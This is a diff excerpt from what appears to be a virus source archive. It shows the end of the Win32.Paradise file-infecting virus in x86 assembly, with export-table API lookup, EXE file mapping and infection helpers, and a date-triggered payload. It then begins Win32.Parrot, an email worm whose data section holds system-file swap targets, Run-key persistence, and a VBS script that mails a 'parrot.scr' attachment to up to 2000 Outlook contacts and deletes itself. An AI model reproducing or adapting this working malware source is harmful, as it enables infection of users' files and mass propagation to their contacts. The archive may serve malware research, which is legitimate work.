lodsd ; Get in EAX the CRC32 of API + push esi + push edi + call GetAPI_ET_CRC32 + pop edi + pop esi + stosd ; Save in [EDI] the API address + cmp byte ptr [esi],0BBh ; Last API? + jz @@4 ; Yeah, get outta here + jmp @@1 ; Nein, loop again +@@4: ret +GetAPIs endp + +GetAPI_ET_CRC32 proc + xor edx,edx + xchg eax,edx ; Put CRC32 of da api in EDX + mov word ptr [ebp+Counter],ax ; Reset counter + mov esi,3Ch + add esi,[ebp+kernel] ; Get PE header of KERNEL32 + lodsw + add eax,[ebp+kernel] ; Normalize + + mov esi,[eax+78h] ; Get a pointer to its + add esi,1Ch ; Export Table + add esi,[ebp+kernel] + + lea edi,[ebp+AddressTableVA] ; Pointer to the address table + lodsd ; Get AddressTable value + add eax,[ebp+kernel] ; Normalize + stosd ; And store in its variable + + lodsd ; Get NameTable value + add eax,[ebp+kernel] ; Normalize + push eax ; Put it in stack + stosd ; Store in its variable + + lodsd ; Get OrdinalTable value + add eax,[ebp+kernel] ; Normalize + stosd ; Store + + pop esi ; ESI = NameTable VA + +@?_3: push esi ; Save again + lodsd ; Get pointer to an API name + add eax,[ebp+kernel] ; Normalize + xchg edi,eax ; Store ptr in EDI + mov ebx,edi ; And in EBX + + push edi ; Save EDI + xor al,al ; Reach the null character + scasb ; that marks us the end of + jnz $-1 ; the api name + pop esi ; ESI = Pointer to API Name + + sub edi,ebx ; EDI = API Name size + + push edx ; Save API's CRC32 + call CRC32 ; Get actual api's CRC32 + pop edx ; Restore API's CRC32 + cmp edx,eax ; Are them equal? + jz @?_4 ; if yes, we got it + + pop esi ; Restore ptr to api name + add esi,4 ; Get the next + inc word ptr [ebp+Counter] ; And increase the counter + jmp @?_3 ; Get another api! +@?_4: + pop esi ; Remove shit from stack + movzx eax,word ptr [ebp+Counter] ; AX = Counter + shl eax,1 ; *2 (it's an array of words) + add eax,dword ptr [ebp+OrdinalTableVA] ; Normalize + xor esi,esi ; Clear ESI + xchg eax,esi ; ESI = Ptr 2 ordinal; EAX = 0 + lodsw ; Get ordinal in AX + shl eax,2 ; And with it we go to the + add eax,dword ptr [ebp+AddressTableVA] ; AddressTable (array of + xchg esi,eax ; dwords) + lodsd ; Get Address of API RVA + add eax,[ebp+kernel] ; and normalize!! That's it! + ret +GetAPI_ET_CRC32 endp + +; ??----?????? ? +; : Paradise virus - Some useful subroutines : +; ? ??????---??? + +Align proc + push edx + xor edx,edx + push eax + div ecx + pop eax + sub ecx,edx + add eax,ecx + pop edx + ret +Align endp + +TruncFile proc + xor eax,eax + push eax + push eax + push ecx + push dword ptr [ebp+FileHandle] + apicall _SetFilePointer + + push dword ptr [ebp+FileHandle] + apicall _SetEndOfFile + ret +TruncFile endp + +OpenFile proc + xor eax,eax + push eax + push eax + push 00000003h + push eax + inc eax + push eax + push 80000000h or 40000000h + push esi + apicall _CreateFileA + ret +OpenFile endp + +CreateMap proc + xor eax,eax + push eax + push ecx + push eax + push 00000004h + push eax + push dword ptr [ebp+FileHandle] + apicall _CreateFileMappingA + ret +CreateMap endp + +MapFile proc + xor eax,eax + push ecx + push eax + push eax + push 00000002h + push dword ptr [ebp+MapHandle] + apicall _MapViewOfFile + ret +MapFile endp + +CRC32 proc + cld + xor ecx,ecx ; Optimized by me - 2 bytes + dec ecx ; less + mov edx,ecx +NextByteCRC: + xor eax,eax + xor ebx,ebx + lodsb + xor al,cl + mov cl,ch + mov ch,dl + mov dl,dh + mov dh,8 +NextBitCRC: + shr bx,1 + rcr ax,1 + jnc NoCRC + xor ax,08320h + xor bx,0EDB8h +NoCRC: dec dh + jnz NextBitCRC + xor ecx,eax + xor edx,ebx + dec edi ; Another fool byte less + jnz NextByteCRC + not edx + not ecx + mov eax,edx + rol eax,16 + mov ax,cx + ret +CRC32 endp + +payload proc + lea eax,[ebp+SYSTEMTIME] + push eax + apicall _GetSystemTime + + cmp word ptr [ebp+ST_wMonth],6 ; On the sixth month... + jnz no_payload + + cmp word ptr [ebp+ST_wDay],6 ; On the sixth day... + jnz no_payload + + lea eax,[ebp+szUSER32] + push eax + apicall _LoadLibraryA + + call @?_1 + db "MessageBoxA",0 +@?_1: push eax + apicall _GetProcAddress + + push 00001000h + lea ebx,[ebp+mark_] + push ebx + lea ebx,[ebp+song] + push ebx + push 00000000h + call eax + +no_payload: + ret +payload endp + +; ??----?????? ? +; : Paradise virus - Virus data : +; ? ??????---??? + +mark_ db "[Win32.Paradise v1.00]",0 + +song db "Late at night i found myself again",10 + db "wondering and watching TV",10 + db "I can't believe what's on the screen",10 + db "something that i wouldn't like to see",10 + db "Many rare species will perish soon",10 + db "and we'll be short on food",10 + db "Why do we have to be so selfish",10 + db "we have to change our attitude",10 + db "I know that i am not",10 + db "the only one that's worried",10 + db "Why don't we all",10 + db "wake up, and and realize",10 + db "Like the birds in the sky",10 + db "we are flying so high",10 + db "without making anykind of sacrifice",10 + db "We've got so little time",10 + db "to undo this crime",10 + db "or we'll lose our paradise",10 + db "It seems to me that there's no sense at all",10 + db "nobody cares, it's always the same",10 + db "Mother nature's crying out in pain",10 + db "I know we are the ones to blame",10,10 + db "Paradise [ Stratovarius ]",0 + + db "Copyright (c) 1999 by Billy Belcebu/iKX",0 + +EXE_MASK db "*.EXE",0 + +szUSER32 db "USER32",0 + +@@NamezCRC32 label byte +@FindFirstFileA dd 0AE17EBEFh +@FindNextFileA dd 0AA700106h +@FindClose dd 0C200BE21h +@CreateFileA dd 08C892DDFh +@DeleteFileA dd 0DE256FDEh +@SetFilePointer dd 085859D42h +@SetFileAttributesA dd 03C19E536h +@CloseHandle dd 068624A9Dh +@GetCurrentDirectoryA dd 0EBC6C18Bh +@SetCurrentDirectoryA dd 0B2DBD7DCh +@GetWindowsDirectoryA dd 0FE248274h +@GetSystemDirectoryA dd 0593AE7CEh +@CreateFileMappingA dd 096B2D96Ch +@MapViewOfFile dd 0797B49ECh +@UnmapViewOfFile dd 094524B42h +@SetEndOfFile dd 059994ED6h +@GetProcAddress dd 0FFC97C1Fh +@LoadLibraryA dd 04134D1ADh +@GetSystemTime dd 075B7EBE8h + db 0BBh + + align dword + +virus_end label byte + +heap_start label byte + +kernel dd kernel_ +infections dd 00000000h +NewSize dd 00000000h +SearchHandle dd 00000000h +FileHandle dd 00000000h +MapHandle dd 00000000h +MapAddress dd 00000000h +AddressTableVA dd 00000000h +NameTableVA dd 00000000h +OrdinalTableVA dd 00000000h +Counter dw 0000h + +@@Offsetz label byte +_FindFirstFileA dd 00000000h +_FindNextFileA dd 00000000h +_FindClose dd 00000000h +_CreateFileA dd 00000000h +_DeleteFileA dd 00000000h +_SetFilePointer dd 00000000h +_SetFileAttributesA dd 00000000h +_CloseHandle dd 00000000h +_GetCurrentDirectoryA dd 00000000h +_SetCurrentDirectoryA dd 00000000h +_GetWindowsDirectoryA dd 00000000h +_GetSystemDirectoryA dd 00000000h +_CreateFileMappingA dd 00000000h +_MapViewOfFile dd 00000000h +_UnmapViewOfFile dd 00000000h +_SetEndOfFile dd 00000000h +_GetProcAddress dd 00000000h +_LoadLibraryA dd 00000000h +_GetSystemTime dd 00000000h + +MAX_PATH equ 260 + +FILETIME STRUC +FT_dwLowDateTime dd ? +FT_dwHighDateTime dd ? +FILETIME ENDS + +WIN32_FIND_DATA label byte +WFD_dwFileAttributes dd ? +WFD_ftCreationTime FILETIME ? +WFD_ftLastAccessTime FILETIME ? +WFD_ftLastWriteTime FILETIME ? +WFD_nFileSizeHigh dd ? +WFD_nFileSizeLow dd ? +WFD_dwReserved0 dd ? +WFD_dwReserved1 dd ? +WFD_szFileName db MAX_PATH dup (?) +WFD_szAlternateFileName db 13 dup (?) + db 03 dup (?) + +directories label byte + +WindowsDir db 7Fh dup (00h) +SystemDir db 7Fh dup (00h) +OriginDir db 7Fh dup (00h) +dirs2inf equ (($-directories)/7Fh) +mirrormirror db dirs2inf + +SYSTEMTIME label byte +ST_wYear dw ? +ST_wMonth dw ? +ST_wDayOfWeek dw ? +ST_wDay dw ? +ST_wHour dw ? +ST_wMinute dw ? +ST_wSecond dw ? +ST_wMilliseconds dw ? + +heap_end label byte + +fakehost: + pop dword ptr fs:[0] + pop eax + popfd + popad + + xor eax,eax + push eax + push offset szTitle + push offset szMessage + push eax + call MessageBoxA + + push 00000000h + call ExitProcess + +end Paradise + +; Komandos de autodefensa animal! + + + + + + + + diff --git a/Win32/Win32.Parrot.asm b/Win32/Win32.Parrot.asm new file mode 100644 index 00000000..6ffc5786 --- /dev/null +++ b/Win32/Win32.Parrot.asm @@ -0,0 +1,3263 @@ +; Virus Name: Parrot +; Version: A +; Type: Win32 EXE Companion / I-Worm +; Author: Gigabyte +; Homepage: http://www.coderz.net/gigabyte + + +.386 +.model flat + +extrn _lcreat:proc +extrn _lwrite:proc +extrn _lclose:proc +extrn ExitProcess:proc +extrn CopyFileA:proc +extrn GetModuleHandleA:proc +extrn GetModuleFileNameA:proc +extrn GetWindowsDirectoryA:proc +extrn lstrcat:proc +extrn ShellExecuteA:proc +extrn FindFirstFileA:proc +extrn FindNextFileA:proc +extrn SetCurrentDirectoryA:proc +extrn lstrlen:proc +extrn lstrcpyn:proc +extrn WinExec:proc +extrn DeleteFileA:proc +extrn RegSetValueA:proc + +size1 equ end_script - mircscript +size2 equ mircscript - parrot +size3 equ parrot - hello +size4 equ mailscript - msgvbs +size5 equ hello - mailscript +size6 equ msgvbs - winstartmsg + +.data +VirusName db '[Win32.Parrot]',0 +Author db 'Gigabyte/Metaphase',0 +script1 db 'c:\mirc\script.ini',0 +script2 db 'd:\mirc\script.ini',0 +script3 db 'c:\mail.vbs',0 +winstart db 'winstart.bat',0 +parrotname db 'parrot.mp3',0 +helloname db 'hello.mp3',0 +msgvbsname db 'msg.vbs',0 +viruscopy db '\parrot.scr',0 +mailviruscopy db 'c:\parrot.scr',0 +wscriptexe db 'wscript.exe',0 +wscriptprt db 'wscript.prt',0 +rundllexe db 'rundll.exe',0 +rundllprt db 'rundll.prt',0 +explorerexe db 'explorer.exe',0 +explorerprt db 'explorer.prt',0 +setverexe db 'setver.exe',0 +setverprt db 'setver.exe',0 +taskmanexe db 'taskman.exe',0 +taskmanprt db 'taskman.prt',0 +taskmonexe db 'taskmon.exe',0 +taskmonprt db 'taskmon.prt',0 +regkey1 db 'Software\Microsoft\Windows\CurrentVersion\RunOnce',0 +regkey2 db 'Software\Microsoft\Windows\CurrentVersion\Run',0 +winstartmsg: + db '@cls',0dh,0ah + db '@echo You',027h,'re infected with Parrot, the talking virus,',0dh,0ah + db '@echo by Gigabyte/Metaphase',0dh,0ah +msgvbs: + db 77,115,103,66,111,120,32,34,89,111,117,39,100,32,98,101 + db 116,116,101,114,32,110,111,116,32,102,117,99,107,32,111,110 + db 32,116,104,101,32,116,97,98,108,101,32,71,114,97,104,97 + db 109,32,67,108,117,108,101,121,44,32,121,111,117,32,115,111 + db 110,32,111,102,32,97,32,98,105,116,99,104,46,34,32,38 + db 32,67,104,114,40,49,51,41,32,38,32,67,104,114,40,49 + db 48,41,32,38,32,34,73,32,100,111,110,39,116,32,101,118 + db 101,110,32,107,110,111,119,32,116,104,101,32,108,97,100,121 + db 32,97,110,100,32,115,104,101,32,99,97,108,108,115,32,109 + db 101,32,97,32,115,111,110,32,111,102,32,97,32,98,105,116 + db 99,104,33,34,32,38,32,67,104,114,40,49,51,41,32,38 + db 32,67,104,114,40,49,48,41,32,38,32,67,104,114,40,49 + db 51,41,32,38,32,67,104,114,40,49,48,41,32,38,32,34 + db 76,97,116,101,114,44,32,73,32,103,111,32,116,111,32,101 + db 97,116,32,97,116,32,97,32,98,105,103,103,97,32,114,101 + db 115,116,97,117,114,97,110,116,46,32,84,104,101,32,119,97 + db 105,116,114,101,115,115,32,98,114,105,110,103,115,32,109,101 + db 32,97,32,115,112,111,111,110,32,97,110,100,32,97,32,107 + db 110,105,102,101,44,32,98,117,116,32,110,111,32,102,111,114 + db 107,46,32,73,32,116,101,108,108,32,104,101,114,44,32,73 + db 32,119,97,110,110,97,32,116,104,101,32,102,111,114,107,46 + db 32,84,104,101,32,116,101,108,108,97,32,109,101,32,101,118 + db 101,114,121,111,110,101,32,119,97,110,110,97,32,102,117,99 + db 107,46,32,73,32,116,101,108,108,32,104,101,114,32,121,111 + db 117,32,110,111,32,117,110,100,101,114,115,116,97,110,100,44 + db 32,73,32,119,97,110,110,97,32,102,111,114,107,32,111,110 + db 32,116,104,101,32,116,97,98,108,101,46,32,83,104,101,32 + db 115,97,121,32,121,111,117,32,98,101,116,116,101,114,32,110 + db 111,32,102,117,99,107,32,111,110,32,116,104,101,32,116,97 + db 98,108,101,44,32,121,111,117,32,115,111,110,32,111,102,32 + db 97,32,98,105,116,99,104,46,32,73,32,100,111,110,39,116 + db 32,101,118,101,110,32,107,110,111,119,32,116,104,101,32,108 + db 97,100,121,32,97,110,100,32,115,104,101,32,99,97,108,108 + db 97,32,109,101,32,97,32,115,111,110,32,111,102,32,97,32 + db 98,105,116,99,104,46,32,73,32,68,79,78,39,84,32,78 + db 69,69,68,32,84,72,73,83,32,83,72,73,84,33,34,44 + db 32,118,98,79,75,79,110,108,121,44,32,34,80,97,114,114 + db 111,116,34,13,10 +mailscript: + db 'On Error Resume Next',0dh,0ah + db 'Dim parrot, Mail, Counter, A, B, C, D, E',0dh,0ah + db 'Set parrot = CreateObject ("outlook.application")',0dh,0ah + db 'Set Mail = parrot.GetNameSpace ("MAPI")',0dh,0ah + db 'For A = 1 To Mail.AddressLists.Count',0dh,0ah + db 'Set B = Mail.AddressLists (A)',0dh,0ah + db 'Counter = 1',0dh,0ah + db 'Set C = parrot.CreateItem (0)',0dh,0ah + db 'For D = 1 To B.AddressEntries.Count',0dh,0ah + db 'E = B.AddressEntries (Counter)',0dh,0ah + db 'C.Recipients.Add E',0dh,0ah + db 'Counter = Counter + 1',0dh,0ah + db 'If Counter > 2000 Then Exit For',0dh,0ah + db 'Next',0dh,0ah + db 'C.Subject = "Parrot screensaver"',0dh,0ah + db 'C.Body = "Hehe hey, look at this screensaver :)"',0dh,0ah + db 'C.Attachments.Add "c:\parrot.scr"',0dh,0ah + db 'C.DeleteAfterSubmit = True',0dh,0ah + db 'C.Send',0dh,0ah + db 'Next',0dh,0ah + db 'Set C = CreateObject ("Scripting.FileSystemObject")',0dh,0ah + db 'C.DeleteFile Wscript.ScriptFullName',0dh,0ah +hello: + db 255,227,20,196,0,5,168,5,147,33,65,0,1,3,33,248 + db 17,17,28,240,12,25,15,192,193,17,222,1,131,35,240,48 + db 68,119,128,120,64,0,97,192,49,96,128,1,247,38,230,254 + db 255,227,20,196,12,10,128,102,215,95,139,40,34,245,212,3 + db 159,79,33,16,231,195,76,238,48,8,122,222,31,4,29,242 + db 225,243,159,3,177,7,194,224,79,41,215,68,0,128,64,64 + db 255,227,20,196,5,9,128,102,223,143,137,16,0,50,24,10 + db 0,0,32,21,103,194,48,183,253,176,46,183,244,68,138,222 + db 44,49,225,96,31,222,15,254,92,62,93,255,244,127,89,137 + db 255,227,20,196,2,8,192,162,247,33,145,40,0,249,249,40 + db 68,10,0,80,48,79,13,182,33,77,71,132,80,249,110,21 + db 250,17,232,97,253,79,138,191,144,211,255,255,255,71,159,15 + db 255,227,20,196,2,9,0,158,255,33,143,48,0,156,27,226 + db 232,53,148,106,41,6,73,169,210,49,11,22,244,9,90,188 + db 99,175,251,222,239,175,217,25,152,25,234,1,91,111,47,73 + db 255,227,20,196,1,5,128,150,255,33,205,16,0,79,179,89 + db 104,140,40,18,194,249,255,245,28,116,155,244,130,62,115,206 + db 252,207,222,150,173,145,221,145,80,10,37,138,192,225,184,4 + db 255,227,20,196,14,5,192,114,227,32,96,76,132,111,246,56 + db 25,41,229,136,134,191,12,3,255,225,185,131,193,240,19,24 + db 41,83,47,117,46,64,52,48,40,24,64,239,19,255,255,251 + db 255,227,20,196,26,7,0,122,235,37,72,72,0,191,33,246 + db 159,239,230,254,79,161,233,126,9,43,30,105,170,196,206,116 + db 42,47,28,65,81,37,23,6,208,180,192,12,74,57,137,254 + db 255,227,20,196,33,13,65,206,239,33,143,104,0,153,77,181 + db 154,127,212,221,15,250,191,187,127,169,109,171,237,253,35,217 + db 47,253,4,25,70,136,23,67,150,14,84,15,183,186,235,49 + db 255,227,20,196,15,5,64,118,243,33,205,48,0,1,5,11 + db 63,225,175,200,225,250,61,220,186,87,173,0,230,78,137,114 + db 132,106,196,64,97,20,116,249,127,127,203,162,59,193,232,133 + db 255,227,20,196,29,5,128,134,235,32,11,6,44,75,223,216 + db 15,4,101,83,241,15,255,255,215,240,247,198,121,184,17,211 + db 36,199,215,89,163,48,7,143,201,81,212,100,239,255,255,242 + db 255,227,20,196,42,5,64,130,247,32,11,88,80,231,204,255 + db 249,33,158,167,48,192,228,207,133,50,217,212,19,130,225,114 + db 58,68,95,255,255,241,200,11,1,120,164,20,6,192,93,58 + db 255,227,20,196,56,6,0,118,243,32,3,212,68,167,123,119 + db 24,197,191,252,239,255,254,223,183,232,127,228,48,142,252,238 + db 119,234,160,168,38,127,250,168,142,77,61,71,62,95,229,3 + db 255,227,20,196,67,5,192,110,235,32,11,206,68,31,218,208 + db 196,108,56,235,252,197,9,137,255,229,69,68,189,64,224,63 + db 212,88,235,247,9,64,78,234,230,201,14,231,176,225,64,67 + db 255,227,20,196,79,5,128,150,231,36,0,230,36,166,154,254 + db 161,8,14,115,191,213,135,137,124,144,179,253,34,47,17,65 + db 70,244,8,116,52,29,58,176,20,36,70,197,4,217,79,248 + db 255,227,20,196,92,5,192,166,247,32,11,206,96,197,163,253 + db 31,251,110,251,53,255,76,168,143,1,128,46,18,28,104,42 + db 26,101,187,15,7,71,132,255,254,250,247,145,180,82,28,127 + db 255,227,20,196,104,6,128,162,247,32,2,206,68,85,138,90 + db 133,191,55,88,160,203,8,112,84,4,83,60,0,0,205,213 + db 235,206,201,231,169,202,242,0,131,240,232,52,135,193,230,131 + db 255,227,20,196,113,6,64,170,235,32,11,206,100,130,42,92 + db 145,206,40,9,14,177,199,231,24,97,130,243,92,153,201,115 + db 210,236,55,39,255,181,39,235,79,153,251,255,50,164,207,58 + db 255,227,20,196,123,6,192,2,207,62,0,0,0,68,125,63 + db 244,222,177,242,103,104,170,160,246,17,154,13,93,163,118,194 + db 12,53,168,156,30,212,102,30,139,167,212,22,104,70,96,248 + db 255,227,20,196,131,7,192,6,179,173,65,0,0,165,18,65 + db 205,122,111,40,88,193,144,121,61,117,250,107,100,252,221,15 + db 251,175,124,198,182,255,77,127,255,185,16,184,15,9,135,255 + db 255,227,20,196,135,17,1,138,223,229,140,57,0,85,30,143 + db 173,253,67,1,29,242,199,189,99,126,13,55,203,127,182,0 + db 26,182,219,50,128,80,201,228,71,246,22,9,0,253,95,80 + db 255,227,20,196,102,14,193,94,239,33,143,104,0,251,255,245 + db 125,79,242,101,63,100,177,135,177,222,147,109,86,29,82,82 + db 97,68,143,127,253,11,255,255,225,211,167,168,254,175,77,180 + db 255,227,20,196,78,6,64,154,243,33,202,16,0,108,28,233 + db 76,130,2,5,251,130,65,137,1,2,101,66,129,15,6,124 + db 243,30,231,24,153,198,152,160,83,166,61,129,36,13,197,82 + db 255,227,20,196,88,6,128,62,203,44,9,146,36,117,168,208 + db 208,251,15,112,4,205,76,95,160,104,155,7,8,193,137,248 + db 94,202,104,95,181,222,232,14,193,224,124,192,211,251,254,83 + db 255,227,20,196,97,6,64,90,191,39,67,0,0,64,163,191 + db 229,226,7,163,249,249,191,202,103,3,223,1,174,19,219,20 + db 87,87,103,103,178,23,231,26,251,62,73,182,57,70,145,166 + db 255,227,20,196,107,19,193,98,223,173,143,106,34,204,17,87 + db 77,48,25,81,163,114,228,251,117,186,3,85,248,66,254,244 + db 134,205,102,47,165,21,173,123,85,3,95,221,123,123,126,231 + db 255,227,20,196,63,18,1,110,231,33,143,120,0,255,207,239 + db 127,242,87,236,247,43,127,237,91,4,224,161,111,172,205,136 + db 47,254,144,90,56,190,80,247,168,247,196,95,43,97,55,1 + db 255,227,20,196,26,5,192,159,3,33,205,56,0,140,159,181 + db 146,129,150,169,240,138,112,232,144,196,218,36,14,39,180,91 + db 213,169,96,236,197,181,176,61,201,5,106,63,178,6,130,176 + db 255,227,20,196,38,5,128,106,247,32,11,198,68,253,211,235 + db 229,224,94,255,183,234,83,10,160,195,173,211,152,202,164,69 + db 160,18,173,85,127,82,0,196,61,214,159,192,0,48,12,131 + db 255,227,20,196,51,5,192,154,235,32,19,208,68,228,251,224 + db 253,10,208,195,203,5,97,211,190,33,119,255,255,246,124,69 + db 8,192,68,81,19,131,224,248,56,115,40,15,159,212,115,234 + db 255,227,20,196,63,5,192,150,243,32,107,10,108,4,63,255 + db 224,248,123,255,225,245,245,255,52,16,96,6,120,230,228,80 + db 36,201,218,142,251,167,205,162,55,151,177,184,149,91,136,159 + db 255,227,20,196,75,6,0,54,227,116,8,94,4,112,130,3 + db 255,249,79,127,79,204,132,220,8,217,89,159,145,68,86,132 + db 129,100,249,204,68,28,246,59,235,127,247,99,112,146,15,52 + db 255,227,20,196,86,6,192,2,199,54,0,0,0,15,226,101 + db 200,64,200,238,117,249,81,39,255,82,255,194,88,96,228,105 + db 134,133,212,171,229,212,233,180,91,218,43,1,224,2,31,97 + db 255,227,20,196,94,7,128,146,223,60,11,196,80,253,71,190 + db 37,128,134,111,34,209,144,22,7,198,86,114,102,154,218,244 + db 128,182,18,198,74,117,6,127,255,255,2,127,127,175,65,32 + db 255,227,20,196,99,5,128,106,235,32,136,94,132,2,128,149 + db 23,81,171,173,2,80,4,216,95,87,191,208,33,187,127,170 + db 191,250,167,254,19,232,128,9,121,87,120,3,48,232,174,247 + db 255,227,20,196,112,5,64,110,243,32,104,88,132,140,90,151 + db 138,186,6,243,168,223,249,128,191,255,229,127,77,208,7,187 + db 110,231,38,121,80,33,16,41,91,107,255,148,105,255,250,61 + db 255,227,20,196,126,6,64,118,227,32,14,22,68,103,126,27 + db 250,242,128,7,11,255,0,0,48,21,84,181,48,196,88,214 + db 160,81,141,142,8,133,48,64,186,206,50,99,250,102,96,151 + db 255,227,20,196,136,6,192,110,223,74,11,30,76,14,61,93 + db 54,168,209,110,153,126,206,205,111,221,154,32,239,223,255,202 + db 127,159,239,63,54,10,30,197,214,97,100,80,233,7,209,218 + db 255,227,20,196,144,7,65,74,231,32,104,5,64,113,80,17 + db 115,0,131,16,100,3,47,155,84,87,65,73,18,200,160,100 + db 52,208,172,255,158,235,234,71,90,20,186,43,234,234,108,195 + db 255,227,20,196,150,6,64,150,231,112,11,196,80,170,145,123 + db 109,76,141,211,232,110,162,227,174,246,155,26,234,232,127,243 + db 136,128,56,41,11,126,165,68,8,3,5,98,221,125,131,63 + db 255,227,20,196,160,7,64,102,235,39,75,0,2,145,111,255 + db 255,255,179,212,103,67,127,133,8,2,238,95,230,154,216,72 + db 135,18,5,217,62,27,47,255,157,249,63,171,252,16,19,34 + db 255,227,20,196,166,11,128,174,235,57,141,104,0,22,119,207 + db 219,105,240,153,7,202,224,119,16,28,255,224,255,63,250,108 + db 154,97,184,1,90,69,89,222,216,250,81,0,144,146,46,222 + db 255,227,20,196,155,16,169,210,239,33,143,136,1,140,6,28 + db 223,127,172,211,63,79,40,100,241,61,55,139,185,13,37,208 + db 212,12,122,70,162,80,8,244,78,157,30,48,117,96,36,17 + db 255,227,20,196,123,6,128,150,251,33,202,16,0,103,203,127 + db 10,12,67,53,31,229,193,16,86,6,210,0,211,42,52,115 + db 152,245,221,183,118,160,232,149,5,85,249,18,63,65,41,130 + db 255,227,20,196,132,5,128,110,243,32,18,158,104,100,225,62 + db 124,5,145,50,135,90,71,110,201,112,174,2,199,228,81,121 + db 127,221,246,185,153,79,7,79,183,15,2,16,73,173,191,254 + db 255,227,20,196,145,5,64,118,235,32,3,216,68,115,216,6 + db 224,205,71,99,122,234,6,59,27,249,196,39,168,48,30,229 + db 28,43,13,47,186,42,236,48,202,215,212,243,201,137,40,11 + db 255,227,20,196,159,7,0,154,239,32,137,132,164,130,43,63 + db 253,230,236,126,160,136,119,138,2,167,122,81,127,209,88,97 + db 56,206,225,149,33,128,48,0,67,244,241,92,32,45,30,76 + db 255,227,20,196,166,7,64,102,231,32,11,204,68,68,123,51 + db 13,127,13,101,162,110,87,160,75,65,139,254,225,164,203,120 + db 154,168,164,251,236,88,88,179,171,115,246,130,156,148,121,115 + db 255,227,20,196,172,7,64,62,215,42,8,152,32,143,169,63 + db 8,242,1,29,35,249,178,2,197,177,222,249,186,142,26,107 + db 9,54,82,152,24,19,122,133,10,206,168,26,255,254,176,87 + db 255,227,20,196,178,7,0,114,231,34,11,216,68,255,255,173 + db 63,18,87,70,94,130,129,67,191,253,219,193,34,63,5,133 + db 155,160,89,255,255,212,117,153,174,157,69,47,93,66,175,183 + db 255,227,20,196,185,7,192,186,239,32,43,196,80,149,235,22 + db 237,71,213,168,3,143,186,234,108,57,10,233,97,141,175,255 + db 254,139,55,59,35,196,198,71,196,227,66,246,37,34,48,17 + db 255,227,20,196,189,7,64,134,247,32,43,214,64,98,65,227 + db 194,255,144,130,197,178,219,120,41,113,163,5,105,158,42,74 + db 120,171,52,143,6,158,213,134,46,111,108,91,122,179,215,186 + db 255,227,20,196,195,6,64,126,247,32,106,204,108,29,61,175 + db 253,217,95,40,33,26,150,77,56,16,204,223,32,167,216,119 + db 68,144,246,88,65,17,70,213,81,63,142,64,137,137,88,143 + db 255,227,20,196,205,8,64,154,239,32,43,204,48,247,75,41 + db 247,104,167,68,65,89,131,52,11,239,195,79,154,101,205,104 + db 110,19,178,230,206,196,91,12,129,136,200,92,4,220,133,179 + db 255,227,20,196,207,9,0,146,235,36,30,4,44,192,160,96 + db 92,16,234,194,0,24,22,13,4,96,0,0,249,94,118,32 + db 122,215,26,25,0,70,80,72,204,71,44,121,212,150,198,111 + db 255,227,20,196,206,8,64,106,223,38,3,206,46,47,33,222 + db 241,184,84,96,169,45,28,93,51,199,218,234,60,196,97,125 + db 54,82,72,23,204,138,133,243,73,65,9,129,186,73,26,32 + db 255,227,20,196,208,9,128,82,219,38,10,94,42,91,149,209 + db 51,47,156,121,29,80,76,60,145,135,133,63,0,13,18,192 + db 0,36,250,124,243,124,243,85,116,193,44,20,107,237,52,50 + db 255,227,20,196,205,9,0,42,199,142,8,194,6,214,160,187 + db 78,165,232,88,49,227,216,32,19,80,14,251,203,31,196,54 + db 15,210,113,166,237,177,108,184,88,204,108,53,38,187,79,132 + db 255,227,20,196,204,8,192,106,111,44,24,70,104,247,114,95 + db 249,254,35,255,159,169,52,4,11,179,219,66,202,179,9,22 + db 191,35,71,41,62,189,71,0,133,47,27,174,180,116,73,1 + db 255,227,20,196,204,8,192,94,155,225,79,0,0,77,47,212 + db 43,127,98,15,226,35,157,127,55,234,36,93,69,34,136,246 + db 83,226,144,1,10,0,153,80,151,80,119,209,228,191,128,14 + db 255,227,20,196,204,19,193,14,219,103,153,136,2,168,2,133 + db 17,211,208,140,129,151,74,95,110,40,151,4,76,146,229,67 + db 94,139,54,51,69,253,254,143,211,156,74,127,173,143,109,178 + db 255,227,20,196,160,19,65,22,231,53,152,120,0,212,32,176 + db 19,206,231,86,40,26,72,236,2,161,69,178,90,44,253,62 + db 159,246,252,75,212,98,234,177,184,79,211,2,206,60,141,2 + db 255,227,20,196,118,6,0,170,247,33,205,16,0,230,135,53 + db 11,184,243,56,80,33,244,205,79,146,142,145,128,36,224,216 + db 250,86,207,38,111,247,82,213,255,69,165,127,245,127,46,255 + db 255,227,20,196,129,5,128,90,243,32,19,212,64,246,203,72 + db 16,48,13,41,255,16,131,26,3,164,29,122,186,69,48,68 + db 30,36,169,42,143,163,49,54,87,246,81,243,205,224,95,129 + db 255,227,20,196,142,8,64,90,227,92,8,82,0,72,249,147 + db 158,75,127,158,29,23,64,71,87,224,146,206,168,8,8,223 + db 88,40,26,35,255,171,124,161,139,59,97,47,164,86,88,246 + db 255,227,20,196,144,6,192,2,219,181,64,0,0,53,158,98 + db 148,8,6,12,251,114,194,194,31,253,95,213,32,78,0,97 + db 12,159,48,193,80,64,133,241,169,253,246,131,74,134,186,137 + db 255,227,20,196,152,11,64,214,235,33,141,104,0,7,125,94 + db 15,139,127,128,0,5,220,72,189,34,80,192,138,111,205,105 + db 16,104,255,137,73,127,255,44,63,243,190,173,183,187,182,91 + db 255,227,20,196,142,10,128,246,239,33,203,104,0,128,0,7 + db 164,53,104,26,235,179,149,19,204,168,76,2,226,120,255,217 + db 42,7,130,207,7,223,83,152,159,255,163,209,180,128,4,142 + db 255,227,20,196,135,5,0,106,251,32,11,198,68,100,255,134 + db 40,62,1,240,88,190,231,255,184,19,0,82,87,112,147,250 + db 157,255,87,64,176,148,199,79,129,198,133,21,253,68,16,5 + db 255,227,20,196,150,6,0,166,247,32,11,206,68,135,77,170 + db 161,204,62,60,122,207,255,213,218,163,206,228,184,73,7,191 + db 255,171,192,32,56,0,0,5,3,33,8,0,0,37,250,206 + db 255,227,20,196,161,6,192,154,247,32,2,146,56,173,250,217 + db 195,239,232,179,150,192,180,41,165,240,211,245,25,172,84,34 + db 229,112,23,229,193,232,11,17,164,94,65,178,28,54,41,145 + db 255,227,20,196,169,7,64,98,231,118,9,210,76,131,202,239 + db 65,166,238,137,155,146,20,11,64,218,3,5,22,160,137,50 + db 130,125,79,207,23,132,127,62,83,114,191,26,0,0,0,28 + db 255,227,20,196,175,7,128,138,231,38,3,214,36,0,238,22 + db 41,111,93,113,208,26,85,10,23,166,233,91,107,190,179,204 + db 242,179,238,1,232,151,76,43,8,169,64,55,213,138,248,173 + db 255,227,20,196,180,8,0,138,235,32,2,210,52,205,85,16 + db 35,44,190,44,102,232,28,42,178,141,158,165,61,76,100,189 + db 